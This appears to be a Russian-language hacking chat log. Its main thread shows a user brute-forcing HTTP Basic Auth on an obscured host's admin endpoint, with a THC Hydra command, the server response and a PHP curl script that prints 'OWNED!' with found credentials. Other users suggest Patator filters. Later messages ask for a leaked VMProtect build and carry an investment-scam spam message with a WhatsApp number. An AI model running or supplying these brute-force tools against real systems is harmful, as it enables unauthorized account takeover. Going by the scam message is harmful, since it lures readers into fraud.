S
Кто где новости читает? Что происходит в нашей сфере в мире, не тех часть как в хакере, а более с уклоном что провернули и тд. Может кто посоветовать какие то трастовые ресурсы
Античат
Size: a a a
2020 April 04
1
Античат
Наши площадки все знаю, больше зарубежные ресурсы интересуют новостные и с аналитикой
HH
Ребята, когда с помощью THC Гидры по "Basic Auth" брутфорсю такая нестандартная cитуация получается:
hydra -l user@xost.udalenniy -P ~/SecLists/Passwords/Common-Credentials/best15.txt -f -S -O -d xost.udalenniy https-get /admin/me?_=158601585
--------------------------
HTTP STATUS CODE: 200 HTTP/1.1 200 OK
Server: nginx
Date: Sat, 04 Apr 2020 18:31:42 GMT
Content-Type: application/json
Content-Length: 72
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none';
{
"reason": "Incorrect username or password",
"status": "invalid"
}
--------------------------
** Вопрос: Как можно отфилтровать (fail or success кейсы) по "reason" или по "status" string-и?
hydra -l user@xost.udalenniy -P ~/SecLists/Passwords/Common-Credentials/best15.txt -f -S -O -d xost.udalenniy https-get /admin/me?_=158601585
--------------------------
HTTP STATUS CODE: 200 HTTP/1.1 200 OK
Server: nginx
Date: Sat, 04 Apr 2020 18:31:42 GMT
Content-Type: application/json
Content-Length: 72
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none';
{
"reason": "Incorrect username or password",
"status": "invalid"
}
--------------------------
** Вопрос: Как можно отфилтровать (fail or success кейсы) по "reason" или по "status" string-и?
s
s
Прочитай часть, которая касается гидры.
HH
Прочитай часть, которая касается гидры.
Спасибо за отклик. Да я уже ковырял все маны. Вот и само проблема в том что по "basic auth" нимогу задать фейл кейсы Например ":S=Incorrect username or password"
В итоге написал х.рню в PHP (работает по крайней мере).
Просто ниужели в гидре нельзя хендлить такую ситуацию
———————-
** Вопрос: Как можно отфилтровать (fail or success кейсы) по "reason" или по "status" string-и?
$ch = curl_init();
$curlConfig = array(
CURLOPT_URL => 'https://bЧЧЧЧЧЧЧЧЧЧЧ',
CURLOPT_POST => false,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
CURLOPT_SSL_VERIFYHOST => true,
CURLOPT_SSL_VERIFYPEER => false,
curl_setopt($ch, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4 ),
CURLOPT_TIMEOUT => 30,
CURLOPT_HEADER => true,
curl_setopt($ch, CURLOPT_TIMEOUT, 12),
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Authorization: Basic ' . base64_encode($uname.':'.$pass))));
curl_setopt_array($ch, $curlConfig);
$result=curl_exec($ch);
$stat_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
//echo CURLOPT_RETURNTRANSFER
echo 'HTTP STATUS CODE: ' . $stat_code . ' ';
echo $result;
curl_close($ch);
if(!preg_match('/Incorrect username or password/i',$result)) // success 200
{
echo '[' . $za .']' . ' ' . 'OWNED! ' . htmlspecialchars((string)$uname) . ' PASSWD: ' . htmlspecialchars((string)$pass). PHP_EOL;
exit;
:
———————————-
В итоге написал х.рню в PHP (работает по крайней мере).
Просто ниужели в гидре нельзя хендлить такую ситуацию
———————-
** Вопрос: Как можно отфилтровать (fail or success кейсы) по "reason" или по "status" string-и?
$ch = curl_init();
$curlConfig = array(
CURLOPT_URL => 'https://bЧЧЧЧЧЧЧЧЧЧЧ',
CURLOPT_POST => false,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
CURLOPT_SSL_VERIFYHOST => true,
CURLOPT_SSL_VERIFYPEER => false,
curl_setopt($ch, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4 ),
CURLOPT_TIMEOUT => 30,
CURLOPT_HEADER => true,
curl_setopt($ch, CURLOPT_TIMEOUT, 12),
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Authorization: Basic ' . base64_encode($uname.':'.$pass))));
curl_setopt_array($ch, $curlConfig);
$result=curl_exec($ch);
$stat_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
//echo CURLOPT_RETURNTRANSFER
echo 'HTTP STATUS CODE: ' . $stat_code . ' ';
echo $result;
curl_close($ch);
if(!preg_match('/Incorrect username or password/i',$result)) // success 200
{
echo '[' . $za .']' . ' ' . 'OWNED! ' . htmlspecialchars((string)$uname) . ' PASSWD: ' . htmlspecialchars((string)$pass). PHP_EOL;
exit;
:
———————————-
HH
В том же Patator-е есть аналог: -x ignore:fgrep='Access denied for user'.
s
Интересует таки гидра?
s
В пататоре точно помню, делал, работало
s
Просто на пыхе это круто, но вопрос в многопоточности
HH
Интересует таки гидра?
Ага. По крайней мере нехочу здаватся)))
HH
Просто на пыхе это круто, но вопрос в многопоточности
+
s
Ну тогда могу только пожелать удачи))
HH
Ну тогда могу только пожелать удачи))
Спасибо огромное! )))
s
serh39(krsk) in Hacker May Cry
господа, а вмп вообще под линукс существует, дабы на сервер можно было поставить? его не ликали случаем?
s
serh39(krsk) in Hacker May Cry
(тащить тачку с виндой ради энкрипта как то мех просто)
2020 April 06
中明
蝙蝠
BH
Our office is closed and yet I'm making money. This is a life changing opportunity because I never believed in anything online because I was scared of being duped. my friend convinced me that it is real. Dear friends I have had two payouts in this week. I want you all to be financially free because life won't be better without money, please contact Olivia Hayes for your investment via
👇👇👇👇👇👇👇👇
@OLIVIAHAYES
WhatsApp. +13152628562
👇👇👇👇👇👇👇👇
@OLIVIAHAYES
WhatsApp. +13152628562
pl
Только что запилил